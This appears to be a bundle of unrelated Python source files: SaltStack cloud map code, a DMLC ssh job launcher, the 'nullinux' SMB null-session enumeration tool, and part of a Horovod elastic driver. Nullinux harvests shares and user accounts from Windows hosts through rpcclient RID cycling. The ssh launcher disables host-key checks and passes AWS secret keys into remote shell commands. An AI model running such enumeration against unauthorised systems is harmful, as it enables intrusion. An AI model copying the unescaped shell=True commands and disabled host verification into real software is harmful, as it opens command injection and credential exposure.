and "grains" in nodedata["minion"]
):
nodedata["minion"]["grains"].update(overrides["minion"]["grains"])
del overrides["minion"]["grains"]
# remove minion key if now is empty dict
if not overrides["minion"]:
del overrides["minion"]
nodedata = salt.utils.dictupdate.update(nodedata, overrides)
# Add the computed information to the return data
ret["create"][nodename] = nodedata
# Add the node name to the defined set
alias, driver = nodedata["provider"].split(":")
defined.add((alias, driver, nodename))
def get_matching_by_name(name):
matches = {}
for alias, drivers in six.iteritems(pmap):
for driver, vms in six.iteritems(drivers):
for vm_name, details in six.iteritems(vms):
if vm_name == name and driver not in matches:
matches[driver] = details["state"]
return matches
for alias, drivers in six.iteritems(pmap):
for driver, vms in six.iteritems(drivers):
for name, details in six.iteritems(vms):
exist.add((alias, driver, name))
if name not in ret["create"]:
continue
# The machine is set to be created. Does it already exist?
matching = get_matching_by_name(name)
if not matching:
continue
# A machine by the same name exists
for item in matching:
if name not in ret["create"]:
# Machine already removed
break
log.warning(
"'%s' already exists, removing from " "the create map.",
name,
)
if "existing" not in ret:
ret["existing"] = {}
ret["existing"][name] = ret["create"].pop(name)
if "hard" in self.opts and self.opts["hard"]:
if self.opts["enable_hard_maps"] is False:
raise SaltCloudSystemExit(
"The --hard map can be extremely dangerous to use, "
"and therefore must explicitly be enabled in the main "
"configuration file, by setting 'enable_hard_maps' "
"to True"
)
# Hard maps are enabled, Look for the items to delete.
ret["destroy"] = exist.difference(defined)
return ret
def run_map(self, dmap):
"""
Execute the contents of the VM map
"""
if self._has_loop(dmap):
msg = "Uh-oh, that cloud map has a dependency loop!"
log.error(msg)
raise SaltCloudException(msg)
# Go through the create list and calc dependencies
for key, val in six.iteritems(dmap["create"]):
log.info("Calculating dependencies for %s", key)
level = 0
level = self._calcdep(dmap, key, val, level)
log.debug("Got execution order %s for %s", level, key)
dmap["create"][key]["level"] = level
try:
existing_list = six.iteritems(dmap["existing"])
except KeyError:
existing_list = six.iteritems({})
for key, val in existing_list:
log.info("Calculating dependencies for %s", key)
level = 0
level = self._calcdep(dmap, key, val, level)
log.debug("Got execution order %s for %s", level, key)
dmap["existing"][key]["level"] = level
# Now sort the create list based on dependencies
create_list = sorted(six.iteritems(dmap["create"]), key=lambda x: x[1]["level"])
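        # Machines with the lowest 'level' (no requirements) come first, so they
        # are created before the machines that require them.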
output = {}
if self.opts["parallel"]:
parallel_data = []
master_name = None
master_minion_name = None
master_host = None
master_finger = None
try:
master_name, master_profile = next(
(
(name, profile)
for name, profile in create_list
if profile.get("make_master", False) is True
)
)
master_minion_name = master_name
log.debug("Creating new master '%s'", master_name)
if (
salt.config.get_cloud_config_value("deploy", master_profile, self.opts)
is False
):
raise SaltCloudSystemExit(
"Cannot proceed with 'make_master' when salt deployment "
"is disabled(ex: --no-deploy)."
)
# Generate the master keys
log.debug("Generating master keys for '%s'", master_profile["name"])
priv, pub = salt.utils.cloud.gen_keys(
salt.config.get_cloud_config_value("keysize", master_profile, self.opts)
)
master_profile["master_pub"] = pub
master_profile["master_pem"] = priv
# Generate the fingerprint of the master pubkey in order to
# mitigate man-in-the-middle attacks
master_temp_pub = salt.utils.files.mkstemp()
with salt.utils.files.fopen(master_temp_pub, "w") as mtp:
mtp.write(pub)
master_finger = salt.utils.crypt.pem_finger(
master_temp_pub, sum_type=self.opts["hash_type"]
)
os.unlink(master_temp_pub)
if master_profile.get("make_minion", True) is True:
master_profile.setdefault("minion", {})
if "id" in master_profile["minion"]:
master_minion_name = master_profile["minion"]["id"]
# Set this minion's master as local if the user has not set it
if "master" not in master_profile["minion"]:
master_profile["minion"]["master"] = "127.0.0.1"
if master_finger is not None:
master_profile["master_finger"] = master_finger
# Generate the minion keys to pre-seed the master:
for name, profile in create_list:
make_minion = salt.config.get_cloud_config_value(
"make_minion", profile, self.opts, default=True
)
if make_minion is False:
continue
log.debug("Generating minion keys for '%s'", profile["name"])
priv, pub = salt.utils.cloud.gen_keys(
salt.config.get_cloud_config_value("keysize", profile, self.opts)
)
profile["pub_key"] = pub
profile["priv_key"] = priv
# Store the minion's public key in order to be pre-seeded in
# the master
master_profile.setdefault("preseed_minion_keys", {})
master_profile["preseed_minion_keys"].update({name: pub})
local_master = False
if (
master_profile["minion"].get("local_master", False)
and master_profile["minion"].get("master", None) is not None
):
# The minion is explicitly defining a master and it's
# explicitly saying it's the local one
local_master = True
out = self.create(master_profile, local_master=local_master)
if not isinstance(out, dict):
log.debug(
"Master creation details is not a dictionary: {0}".format(out)
)
elif "Errors" in out:
raise SaltCloudSystemExit(
"An error occurred while creating the master, not "
"continuing: {0}".format(out["Errors"])
)
deploy_kwargs = (
self.opts.get("show_deploy_args", False) is True
and
# Get the needed data
out.get("deploy_kwargs", {})
or
# Strip the deploy_kwargs from the returned data since we don't
# want it shown in the console.
out.pop("deploy_kwargs", {})
)
master_host = deploy_kwargs.get(
"salt_host", deploy_kwargs.get("host", None)
)
if master_host is None:
raise SaltCloudSystemExit(
"Host for new master {0} was not found, "
"aborting map".format(master_name)
)
output[master_name] = out
except StopIteration:
log.debug("No make_master found in map")
# Local master?
# Generate the fingerprint of the master pubkey in order to
# mitigate man-in-the-middle attacks
master_pub = os.path.join(self.opts["pki_dir"], "master.pub")
if os.path.isfile(master_pub):
master_finger = salt.utils.crypt.pem_finger(
master_pub, sum_type=self.opts["hash_type"]
)
opts = self.opts.copy()
if self.opts["parallel"]:
# Force display_ssh_output to be False since the console will
# need to be reset afterwards
log.info(
"Since parallel deployment is in use, ssh console output "
"is disabled. All ssh output will be logged though"
)
opts["display_ssh_output"] = False
local_master = master_name is None
for name, profile in create_list:
if name in (master_name, master_minion_name):
# Already deployed, it's the master's minion
continue
if (
"minion" in profile
and profile["minion"].get("local_master", False)
and profile["minion"].get("master", None) is not None
):
# The minion is explicitly defining a master and it's
# explicitly saying it's the local one
local_master = True
if master_finger is not None and local_master is False:
profile["master_finger"] = master_finger
if master_host is not None:
profile.setdefault("minion", {})
profile["minion"].setdefault("master", master_host)
if self.opts["parallel"]:
parallel_data.append(
{
"opts": opts,
"name": name,
"profile": profile,
"local_master": local_master,
}
)
continue
# Not deploying in parallel
try:
output[name] = self.create(profile, local_master=local_master)
if (
self.opts.get("show_deploy_args", False) is False
and "deploy_kwargs" in output
and isinstance(output[name], dict)
):
output[name].pop("deploy_kwargs", None)
except SaltCloudException as exc:
log.error(
"Failed to deploy '%s'. Error: %s",
name,
exc,
exc_info_on_loglevel=logging.DEBUG,
)
output[name] = {"Error": str(exc)}
for name in dmap.get("destroy", ()):
output[name] = self.destroy(name)
if self.opts["parallel"] and parallel_data:
if "pool_size" in self.opts:
pool_size = self.opts["pool_size"]
else:
pool_size = len(parallel_data)
log.info("Cloud pool size: %s", pool_size)
output_multip = enter_mainloop(
_create_multiprocessing, parallel_data, pool_size=pool_size
)
# We have deployed in parallel, now do start action in
# correct order based on dependencies.
if self.opts["start_action"]:
actionlist = []
grp = -1
for key, val in groupby(
six.itervalues(dmap["create"]), lambda x: x["level"]
):
actionlist.append([])
grp += 1
for item in val:
actionlist[grp].append(item["name"])
out = {}
for group in actionlist:
log.info(
"Running %s on %s", self.opts["start_action"], ", ".join(group)
)
client = salt.client.get_local_client()
out.update(
client.cmd(
",".join(group),
self.opts["start_action"],
timeout=self.opts["timeout"] * 60,
tgt_type="list",
)
)
for obj in output_multip:
next(six.itervalues(obj))["ret"] = out[next(six.iterkeys(obj))]
output.update(obj)
else:
for obj in output_multip:
output.update(obj)
return output
def init_pool_worker():
"""
Make every worker ignore KeyboardInterrupt, since it will be handled by the
parent process.
"""
signal.signal(signal.SIGINT, signal.SIG_IGN)
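# Illustrative sketch (not part of the original module): an initializer like
# init_pool_worker is typically wired into a multiprocessing.Pool so that the
# worker processes ignore Ctrl-C and only the parent handles it. The pool and
# the abs() workload below are hypothetical examples, not Salt APIs.
def _example_pool_ignoring_sigint():
    import multiprocessing

    with multiprocessing.Pool(processes=2, initializer=init_pool_worker) as pool:
        return pool.map(abs, [-1, -2, -3])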
def create_multiprocessing(parallel_data, queue=None):
"""
This function will be called from another process when running a map in
parallel mode. The result from the create is always a json object.
"""
salt.utils.crypt.reinit_crypto()
parallel_data["opts"]["output"] = "json"
cloud = Cloud(parallel_data["opts"])
try:
output = cloud.create(
parallel_data["profile"], local_master=parallel_data["local_master"]
)
except SaltCloudException as exc:
log.error(
"Failed to deploy '%s'. Error: %s",
parallel_data["name"],
exc,
exc_info_on_loglevel=logging.DEBUG,
)
return {parallel_data["name"]: {"Error": str(exc)}}
if parallel_data["opts"].get("show_deploy_args", False) is False and isinstance(
output, dict
):
output.pop("deploy_kwargs", None)
return {parallel_data["name"]: salt.utils.data.simple_types_filter(output)}
def destroy_multiprocessing(parallel_data, queue=None):
"""
This function will be called from another process when running a map in
parallel mode. The result from the destroy is always a json object.
"""
salt.utils.crypt.reinit_crypto()
parallel_data["opts"]["output"] = "json"
clouds = salt.loader.clouds(parallel_data["opts"])
try:
fun = clouds["{0}.destroy".format(parallel_data["driver"])]
with salt.utils.context.func_globals_inject(
fun,
__active_provider_name__=":".join(
[parallel_data["alias"], parallel_data["driver"]]
),
):
output = fun(parallel_data["name"])
except SaltCloudException as exc:
log.error(
"Failed to destroy %s. Error: %s",
parallel_data["name"],
exc,
exc_info_on_loglevel=logging.DEBUG,
)
return {parallel_data["name"]: {"Error": str(exc)}}
return {parallel_data["name"]: salt.utils.data.simple_types_filter(output)}
def run_parallel_map_providers_query(data, queue=None):
"""
This function will be called from another process when building the
providers map.
"""
salt.utils.crypt.reinit_crypto()
cloud = Cloud(data["opts"])
try:
with salt.utils.context.func_globals_inject(
cloud.clouds[data["fun"]],
__active_provider_name__=":".join([data["alias"], data["driver"]]),
):
return (
data["alias"],
data["driver"],
salt.utils.data.simple_types_filter(cloud.clouds[data["fun"]]()),
)
except Exception as err: # pylint: disable=broad-except
log.debug(
"Failed to execute '%s()' while querying for running nodes: %s",
data["fun"],
err,
exc_info_on_loglevel=logging.DEBUG,
)
# Failed to communicate with the provider, don't list any nodes
return data["alias"], data["driver"], ()
# for pickle and multiprocessing, we can't use decorators directly
def _run_parallel_map_providers_query(*args, **kw):
return communicator(run_parallel_map_providers_query)(*args[0], **kw)
def _destroy_multiprocessing(*args, **kw):
return communicator(destroy_multiprocessing)(*args[0], **kw)
def _create_multiprocessing(*args, **kw):
return communicator(create_multiprocessing)(*args[0], **kw)
|
ssh.py
|
#!/usr/bin/env python
"""
DMLC submission script by ssh
One needs to make sure all slave machines are ssh-able.
"""
from __future__ import absolute_import
import os, subprocess, logging
from threading import Thread
from . import tracker
def sync_dir(local_dir, slave_node, slave_dir):
"""
Sync the working directory from the root node to a slave node.
"""
remote = slave_node + ':' + slave_dir
logging.info('rsync %s -> %s', local_dir, remote)
prog = 'rsync -az --rsh="ssh -o StrictHostKeyChecking=no" %s %s' % (
local_dir, remote)
subprocess.check_call([prog], shell = True)
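# Illustrative usage sketch (hypothetical host and paths, not part of the script):
# push the current working directory to a single slave before launching jobs on it.
def _example_sync_dir():
    sync_dir(os.getcwd() + '/', 'worker1.example.com', '/tmp/dmlc-job/')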
def get_env(pass_envs):
envs = []
# get system envs
keys = ['LD_LIBRARY_PATH', 'AWS_ACCESS_KEY_ID', 'AWS_SECRET_ACCESS_KEY']
for k in keys:
v = os.getenv(k)
if v is not None:
envs.append('export ' + k + '=' + v + ';')
# get pass_envs
for k, v in pass_envs.items():
envs.append('export ' + str(k) + '=' + str(v) + ';')
return (' '.join(envs))
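# Illustrative sketch (not part of the script): get_env turns the variables handed
# in by the tracker into a prefix of shell 'export' statements, e.g.
# {'DMLC_ROLE': 'worker'} becomes "export DMLC_ROLE=worker;", plus any of the
# whitelisted system variables that happen to be set locally.
def _example_get_env():
    return get_env({'DMLC_ROLE': 'worker'})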
def submit(args):
assert args.host_file is not None
with open(args.host_file) as f:
tmp = f.readlines()
assert len(tmp) > 0
hosts=[]
for h in tmp:
if len(h.strip()) > 0:
hosts.append(h.strip())
def ssh_submit(nworker, nserver, pass_envs):
"""
customized submit script
"""
# thread func to run the job
def run(prog):
subprocess.check_call(prog, shell = True)
# sync programs if necessary
local_dir = os.getcwd()+'/'
working_dir = local_dir
if args.sync_dst_dir is not None and args.sync_dst_dir != 'None':
working_dir = args.sync_dst_dir
for h in hosts:
sync_dir(local_dir, h, working_dir)
# launch jobs
for i in range(nworker + nserver):
pass_envs['DMLC_ROLE'] = 'server' if i < nserver else 'worker'
node = hosts[i % len(hosts)]
prog = get_env(pass_envs) + ' cd ' + working_dir + '; ' + (' '.join(args.command))
prog = 'ssh -o StrictHostKeyChecking=no ' + node + ' \'' + prog + '\''
thread = Thread(target = run, args=(prog,))
thread.daemon = True
thread.start()
return ssh_submit
tracker.submit(args.num_workers, args.num_servers,
fun_submit=ssh_submit,
pscmd=(' '.join(args.command)))
|
nullinux.py
|
#!/usr/bin/env python3
from __future__ import print_function
import sys
import re
import argparse
import datetime
from time import sleep
from ipaddress import IPv4Network
from threading import Thread, active_count
if sys.version_info[0] < 3:
from commands import getoutput
else:
from subprocess import getoutput
class TargetParser():
# Condensed version of IPParser using only standard libraries
regex = {
'single': re.compile(r"^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$"),
'range': re.compile(r"^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}-\d{1,3}$"),
'cidr': re.compile(r"^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}/\d{1,2}$"),
'dns': re.compile(r"^.+\.[a-zA-Z]{2,}$")
}
def __init__(self):
self.hosts = []
def parse(self, target):
try:
self.controller(target)
return self.hosts
except Exception as e:
print_failure('Target Error: {}\n'.format(str(e)))
sys.exit(1)
def controller(self, target):
if target.endswith('.txt'):
self.fileParser(target)
elif re.match(self.regex['range'], target):
self.rangeParser(target)
elif re.match(self.regex['dns'], target):
self.hosts.append(target)
elif ',' in target:
self.multiParser(target)
else:
for ip in IPv4Network(target):
self.hosts.append(ip)
def fileParser(self, filename):
with open(filename, 'r') as f:
for line in f:
self.controller(line.strip())
def multiParser(self, target):
for t in target.strip().split(','):
self.controller(t)
def rangeParser(self, target):
a = target.split("-")
b = a[0].split(".")
for x in range(int(b[3]), int(a[1]) + 1):
tmp = b[0] + "." + b[1] + "." + b[2] + "." + str(x)
self.hosts.append(tmp)
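# Illustrative usage sketch (hypothetical targets, not part of the tool): the parser
# accepts a single IP, a dash range, CIDR notation, a DNS name, a comma-separated
# list, or a .txt file of any of the above, and returns a flat list of hosts.
def _example_target_parser():
    return TargetParser().parse("192.168.1.1-3,demo.local")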
class nullinux():
known_users = ['Administrator', 'Guest', 'krbtgt', 'root', 'bin']
domain_sid = ""
acquired_users = []
def __init__(self, username, password, verbose, output_file):
self.username = username
self.password = password
self.verbose = verbose
self.output_file = output_file
def enum_os(self, target):
cmd = "smbclient //{}/IPC$ -U {}%{} -t 1 -c exit".format(target,self.username, self.password)
for line in getoutput(cmd).splitlines():
if "Domain=" in line:
# OS info is no longer enumerated in newer Windows servers
print_success("{}: {}".format(target, line))
elif "NT_STATUS_LOGON_FAILURE" in line:
print_failure("{}: Authentication Failed".format(target))
return False
return True
def get_dom_sid(self, target):
print("\n\033[1;34m[*]\033[1;m Enumerating Domain Information for: {}".format(target))
cmd = "rpcclient -c lsaquery -U {}%{} {}".format(self.username, self.password, target)
for line in getoutput(cmd).splitlines():
if "Domain Name:" in line:
print_success(line)
elif "Domain Sid:" in line:
self.domain_sid = line.split(":")[1].strip()
print_success("Domain SID: {}".format(self.domain_sid))
if not self.domain_sid:
print_failure("Could not attain Domain SID")
def create_userfile(self):
openfile = open(self.output_file, 'a')
for user in self.acquired_users:
openfile.write('{}\n'.format(user))
openfile.close()
def enum_shares(self, target):
count = 0
acquired_shares = []
smbclient_types = ['Disk', 'IPC', 'Printer']
print("\n\033[1;34m[*]\033[1;m Enumerating Shares for: {}".format(target))
cmd = "smbclient -L {} -U {}%{} -t 2".format(target, self.username, self.password)
for line in getoutput(cmd).splitlines():
if count == 0: #Print Enum Share Heading
print(" {:26} {}".format("Shares", "Comments"))
print(" " + "-" * 43)
count += 1
for t in smbclient_types:  # Check if the smbclient output line matches a known share type
if t in line:
try:
if 'IPC$' in line:
print(" \\\{}\{}".format(target, "IPC$"))
acquired_shares.append("IPC$")
else:
share = line.split(t)[0].strip()
comment = line.split(t)[1].strip()
print(" \\\{}\{:15} {}".format(target, share, comment))
acquired_shares.append(share)
except KeyboardInterrupt:
print("\n[!] Key Event Detected...\n\n")
sys.exit(0)
except:
pass
if acquired_shares:
#Enumerate dir of each new share
for s in acquired_shares:
self.enum_dir(target, s)
else:
print(" ")
print_failure("No Shares Detected")
def share_header(self, target, share):
print("\n ", end='')
print_status("Enumerating: \\\%s\%s" % (target, share))
def enum_dir(self, target, share):
header_count = 0
cmd = "smbclient //{}/\'{}\' -t 3 -U {}%{} -c dir".format(target, share, self.username, self.password)
for line in getoutput(cmd).splitlines():
if "NT_STATUS" in line or "_ACCESS_DENIED" in line:
if self.verbose:
if header_count == 0:
header_count += 1
self.share_header(target, share)
print(" ", end='')
print_failure(line)
elif "Domain=" in line or "blocks available" in line or "WARNING" in line or "failed:" in line or not line:
pass
else:
if header_count == 0:
header_count += 1
self.share_header(target, share)
print(" "+line)
def enum_querydispinfo(self, target):
print("\n\033[1;34m[*]\033[1;m Enumerating querydispinfo for: {}".format(target))
cmd = "rpcclient -c querydispinfo -U {}%{} {}".format(self.username, self.password, target)
for line in getoutput(cmd).splitlines():
try:
user_account = line.split("Name:")[0].split("Account:")[1].strip()
print(" " + user_account)
if user_account not in self.acquired_users:
self.acquired_users.append(user_account)
except KeyboardInterrupt:
print("\n[!] Key Event Detected...\n\n")
sys.exit(0)
except:
pass
def enum_enumdomusers(self, target):
print("\n\033[1;34m[*]\033[1;m Enumerating enumdomusers for: {}".format(target))
cmd = "rpcclient -c enumdomusers -U {}%{} {}".format(self.username, self.password, target)
for line in getoutput(cmd).splitlines():
try:
user_account = line.split("[")[1].split("]")[0].strip()
print(" "+user_account)
if user_account not in self.acquired_users:
self.acquired_users.append(user_account)
except KeyboardInterrupt:
print("\n[!] Key Event Detected...\n\n")
sys.exit(0)
except:
pass
def enum_lsa(self, target):
print("\n\033[1;34m[*]\033[1;m Enumerating LSA for: {}".format(target))
cmd = "rpcclient -c lsaenumsid -U {}%{} {}".format(self.username, self.password, target)
output = getoutput(cmd)
for line in output.splitlines():
try:
if "S-1-5-21" in line:
user_sid = "rpcclient -c 'lookupsids {}' -U {}%{} {}".format(line, self.username, self.password, target)
for x in getoutput(user_sid).splitlines():
user_account = x.split("\\")[1].split("(")[0].strip()
count = int(x.split("(")[1].split(")")[0].strip())
if count == 1:
if self.verbose:
print(" "+x)
else:
print(" "+user_account)
if user_account not in self.acquired_users:
self.acquired_users.append(user_account)
elif count > 1 and "*unknown*\*unknown*" not in line:
if self.verbose:
print(" {:35} (Network/LocalGroup)".format(x))
else:
print(" {:35} (Network/Local Group)".format(user_account))
except KeyboardInterrupt:
print("\n[!] Key Event Detected...\n\n")
sys.exit(0)
except:
pass
def rid_cycling(self, target, ridrange, max_threads):
print("\n\033[1;34m[*]\033[1;m Performing RID Cycling for: {}".format(target))
if not self.domain_sid:
print_failure("RID Failed: Could not attain Domain SID")
return False
# Handle custom RID range input
try:
r = ridrange.split("-")
rid_range = list(range(int(r[0]), int(r[1])+1))
except:
print_failure("Error parsing custom RID range, reverting to default")
rid_range = list(range(500, 551))
for rid in rid_range:
try:
Thread(target=self.rid_thread, args=(rid,target,), daemon=True).start()
except:
pass
while active_count() > max_threads:
sleep(0.001)
while active_count() > 1:
sleep(0.001)
def rid_thread(self, rid, target):
cmd = "rpcclient -c \"lookupsids {}-{}\" -U {}%{} {}".format(self.domain_sid, rid, self.username, self.password,target)
for line in getoutput(cmd).splitlines():
if "S-1-5-21" in line:
# Split output to get username/group name
user_account = line.split("\\")[1].split("(")[0].strip()
count = int(line.split("(")[1].split(")")[0].strip())
if count == 1:
if self.verbose:
print(" " + line)
else:
print(" " + user_account)
if user_account not in self.acquired_users:
self.acquired_users.append(user_account)
elif count > 1 and "*unknown*\*unknown*" not in line:
if self.verbose:
print(" {:35} (Network/LocalGroup)".format(line))
else:
print(" {:35} (Network/LocalGroup)".format(user_account))
def enum_known_users(self, target):
print("\n\033[1;34m[*]\033[1;m Testing {} for Known Users".format(target))
for user in self.known_users:
cmd = "rpcclient -c \"lookupnames {}\" -U {}%{} {}".format(user, self.username, self.password, target)
for line in getoutput(cmd).splitlines():
if "S-1-5" in line:
try:
user_account = line.split(" ")[0].strip()
if self.verbose:
print(" " + line)
else:
print(" " + user_account)
if user_account not in self.acquired_users and int(line.split("User:")[1]) == 1:
self.acquired_users.append(user_account)
except KeyboardInterrupt:
print("\n[!] Key Event Detected...\n\n")
sys.exit(0)
except:
pass
def enum_dom_groups(self, target):
print("\n\033[1;34m[*]\033[1;m Enumerating Group Memberships for: {}".format(target))
cmd = "rpcclient -c enumdomgroups -U {}%{} {}".format(self.username, self.password, target)
for line in getoutput(cmd).splitlines():
if "rid:" in line:
try:
group = line.split("[")[1].split("]")[0].strip()
print_success("Group: %s" % (group))
self.enum_group_mem(target, group)
except KeyboardInterrupt:
print("\n[!] Key Event Detected...\n\n")
sys.exit(0)
except:
pass
def enum_group_mem(self, target, group):
cmd = "net rpc group members \'{}\' -U {}%{} -I {}".format(group, self.username, self.password, target)
for line in getoutput(cmd).splitlines():
try:
user_account = line.split("\\")[1].strip()
print(" " + user_account)
if user_account not in self.acquired_users:
self.acquired_users.append(user_account)
except KeyboardInterrupt:
print("\n[!] Key Event Detected...\n\n")
sys.exit(0)
except:
pass
def print_success(msg):
print('\033[1;32m[+]\033[0m {}'.format(msg))
def print_status(msg):
print('\033[1;34m[*]\033[0m {}'.format(msg))
def print_failure(msg):
print('\033[1;31m[-]\033[0m {}'.format(msg))
def time_stamp():
return datetime.datetime.now().strftime('%m-%d-%Y %H:%M')
def nullinux_enum(args, scan, target):
scan.enum_os(target)
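# Note: -users and -shares are argparse store_false flags, so args.users and
# args.shares default to True and passing one flag disables the *other*
# category of enumeration (-users -> users only, -shares -> shares only).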
if args.users:
scan.enum_shares(target)
if args.shares:
if not scan.domain_sid:
scan.get_dom_sid(target)
scan.enum_querydispinfo(target)
scan.enum_enumdomusers(target)
if not args.quick:
scan.enum_lsa(target)
scan.rid_cycling(target, args.rid_range, args.max_threads)
scan.enum_known_users(target)
scan.enum_dom_groups(target)
def main(args):
print("\n Starting nullinux v{} | {}\n\n".format(version, time_stamp()))
scan = nullinux('\"{}\"'.format(args.username), '\"{}\"'.format(args.password), args.verbose, args.output_file)
for t in args.target:
try:
if args.rid_only:
scan.get_dom_sid(t)
scan.rid_cycling(t, args.rid_range, args.max_threads)
else:
nullinux_enum(args, scan, t)
except Exception as e:
print("\n[*] Main Error: {}\n\n".format(e))
if args.users:
print("\n\033[1;34m[*]\033[1;m {} unique user(s) identified".format(len(scan.acquired_users)))
if scan.acquired_users:
print("\033[1;32m[+]\033[1;m Writing users to file: {}\n".format(args.output_file))
scan.create_userfile()
if __name__ == '__main__':
try:
version = '5.5.0dev'
args = argparse.ArgumentParser(description=("""
nullinux | v{0}
-----------------------------------
SMB null-session enumeration tool to gather OS,
user, share, and domain information.
usage:
nullinux -users -quick DC1.demo.local,10.0.1.1
nullinux -rid -range 500-600 10.0.0.1
nullinux -shares -U 'Domain\\User' -P 'Password1' 10.0.0.1""").format(version), formatter_class=argparse.RawTextHelpFormatter, usage=argparse.SUPPRESS)
args.add_argument('-v', dest="verbose", action='store_true', help="Verbose output")
args.add_argument('-o', dest="output_file", type=str, default="./nullinux_users.txt", help="Output users to the specified file")
auth = args.add_argument_group("Authentication")
auth.add_argument('-u', '-U', dest='username', type=str, default="", help='Username')
auth.add_argument('-p', '-P', dest='password', type=str, default="", help='Password')
enum = args.add_argument_group("Enumeration")
enum.add_argument('-shares', dest="shares", action='store_false', help="Enumerate shares only")
enum.add_argument('-users', dest="users", action='store_false', help="Enumerate users only")
enum.add_argument('-q', '-quick', dest="quick", action='store_true', help="Fast user enumeration")
enum.add_argument('-r', '-rid', dest="rid_only", action='store_true', help="Perform RID cycling only")
enum.add_argument('-range', dest='rid_range', type=str, default="500-550", help='Set Custom RID cycling range (Default: \'500-550\')')
enum.add_argument('-T', dest='max_threads', type=int, default=15, help='Max threads for RID cycling (Default: 15)')
args.add_argument(dest='target', nargs='+', help='Target server')
args = args.parse_args()
args.target = TargetParser().parse(args.target[0])
main(args)
except KeyboardInterrupt:
print("\n[!] Key Event Detected...\n\n")
sys.exit(0)
|
driver.py
|
# Copyright 2020 Uber Technologies, Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import logging
import os
import queue
import threading
import time
from collections import defaultdict
from horovod.runner.common.util import hosts, timeout
from horovod.runner.elastic.discovery import HostManager
from horovod.runner.elastic.registration import WorkerStateRegistry
from horovod.runner.elastic.worker import HostUpdateResult, WorkerNotificationClient
DISCOVER_HOSTS_FREQUENCY_SECS = 1.0
ELASTIC_TIMEOUT_SECS = 600
def _epoch_time_s():
return int(time.time())
class Results(object):
def __init__(self, error_message, worker_results):
self.error_message = error_message
self.worker_results = worker_results
class ResultsRecorder(object):
def __init__(self):
self._error_message = None
self._worker_results = {}
self._worker_threads = queue.Queue()
def expect(self, worker_thread):
self._worker_threads.put(worker_thread)
def set_error_message(self, error_message):
self._error_message = error_message
def add_result(self, key, value):
if key in self._worker_results:
return
self._worker_results[key] = value
def get_results(self):
while not self._worker_threads.empty():
worker_thread = self._worker_threads.get()
worker_thread.join()
return Results(self._error_message, self._worker_results)
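# Illustrative sketch (not part of this module, hypothetical worker name): the
# driver registers each worker thread with expect(), records one
# (exit_code, timestamp) tuple per worker via add_result(), and get_results()
# joins every registered thread before returning the aggregated Results.
def _example_results_recorder():
    recorder = ResultsRecorder()
    worker = threading.Thread(
        target=lambda: recorder.add_result('host-0[0]', (0, _epoch_time_s())))
    recorder.expect(worker)
    worker.start()
    return recorder.get_results()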
class ElasticDriver(object):
def __init__(self, rendezvous, discovery, min_np, max_np, timeout=None, reset_limit=None, verbose=0):
self._rendezvous = rendezvous
self._host_manager = HostManager(discovery)
self._min_np = min_np
self._max_np = max_np
self._verbose = verbose
self._host_assignments = {}
self._rank_assignments = {}
self._world_size = 0
self._wait_hosts_cond = threading.Condition()
self._timeout = timeout or int(os.getenv('HOROVOD_ELASTIC_TIMEOUT', ELASTIC_TIMEOUT_SECS))
self._create_worker_fn = None
self._worker_clients = {}
self._worker_registry = WorkerStateRegistry(self, self._host_manager, reset_limit=reset_limit)
self._results = ResultsRecorder()
self._shutdown = threading.Event()
self._discovery_thread = threading.Thread(target=self._discover_hosts)
self._discovery_thread.daemon = True
self._discovery_thread.start()
def start(self, np, create_worker_fn):
self._create_worker_fn = create_worker_fn
self._activate_workers(np)
def resume(self):
self._activate_workers(self._min_np)
def stop(self, error_message=None):
self._results.set_error_message(error_message)
self._shutdown.set()
self._rendezvous.stop()
self._discovery_thread.join()
def finished(self):
return self._shutdown.is_set()
def get_results(self):
return self._results.get_results()
def register_worker_server(self, host, slot, addresses, secret_key):
self._worker_clients[(host, slot)] = WorkerNotificationClient(
addresses, secret_key, self._verbose)
def get_worker_client(self, slot_info):
return self._worker_clients.get((slot_info.hostname, slot_info.local_rank))
def record_ready(self, host, slot):
self._worker_registry.record_ready(host, slot)
def world_size(self):
return self._world_size
def local_size(self, host):
return len(self._host_assignments[host])
def get_slot_info(self, host, slot):
return self._host_assignments[host][slot] if self.has_rank_assignment(host, slot) \
else hosts.INVALID_SLOT_INFO
def get_coordinator_info(self):
return self._rank_assignments.get(0)
def has_rank_assignment(self, host, slot):
if self._host_manager.is_blacklisted(host):
return False
return host in self._host_assignments and len(self._host_assignments[host]) > slot
@property
def host_assignments(self):
return self._host_assignments
def wait_for_available_slots(self, min_np, min_hosts=1):
extra_message = ' An elastic job also requires that at least two hosts ' \
'are available to resolve compatible network interfaces. If you know which interfaces ' \
'are compatible in your network, set `--network-interface` to skip this check.' \
if min_hosts > 1 else ''
tmout = timeout.Timeout(
self._timeout,
message='Timed out waiting for {{activity}}. Please check that you have '
'enough resources to run at least {min_np} Horovod processes.{extra_message}'
.format(min_np=min_np, extra_message=extra_message))
self._wait_hosts_cond.acquire()
try:
while True:
current_hosts = self._host_manager.current_hosts
avail_slots = current_hosts.count_available_slots()
logging.debug(f"current available slots: {avail_slots}")
avail_hosts = len(current_hosts.available_hosts)
logging.debug(f"current available hosts: {avail_hosts}.")
if avail_slots >= min_np and avail_hosts >= min_hosts:
return current_hosts
if self._shutdown.is_set():
raise RuntimeError('Job has been shutdown, see above error messages for details.')
self._wait_hosts_cond.wait(tmout.remaining())
tmout.check_time_out_for('minimum number of slots to become available')
finally:
self._wait_hosts_cond.release()
def _activate_workers(self, min_np):
logging.info('wait for available slots: {}'.format(min_np))
current_hosts = self.wait_for_available_slots(min_np)
pending_slots = self._update_host_assignments(current_hosts)
self._worker_registry.reset(self.world_size())
self._start_worker_processes(pending_slots)
def _discover_hosts(self):
first_update = True
while not self._shutdown.is_set():
self._wait_hosts_cond.acquire()
try:
update_res = self._host_manager.update_available_hosts()
if update_res != HostUpdateResult.no_update:
self._notify_workers_host_changes(self._host_manager.current_hosts, update_res)
self._wait_hosts_cond.notify_all()
except RuntimeError as e:
if first_update:
# Misconfiguration, fail the job immediately
